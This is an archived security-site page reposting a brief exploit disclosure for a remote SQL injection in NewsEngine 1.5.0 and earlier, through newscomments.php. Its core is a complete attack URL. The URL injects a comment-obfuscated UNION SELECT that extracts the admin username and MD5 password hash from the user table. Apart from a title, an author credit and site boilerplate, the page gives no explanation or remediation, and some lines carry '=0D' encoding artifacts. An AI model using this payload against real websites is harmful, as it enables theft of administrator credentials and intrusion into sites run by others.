Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-2727.htm

ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability



ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability



# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability=0D
# Author :   ajann=0D
=0D
### Vulnerability;=0D
=0D
$$$ http://[target]/[path]/newscomments.php=0D 
=0D
Example:=0D
=0D
$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*=0D 
=0D
Admin MD5 HaSh


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH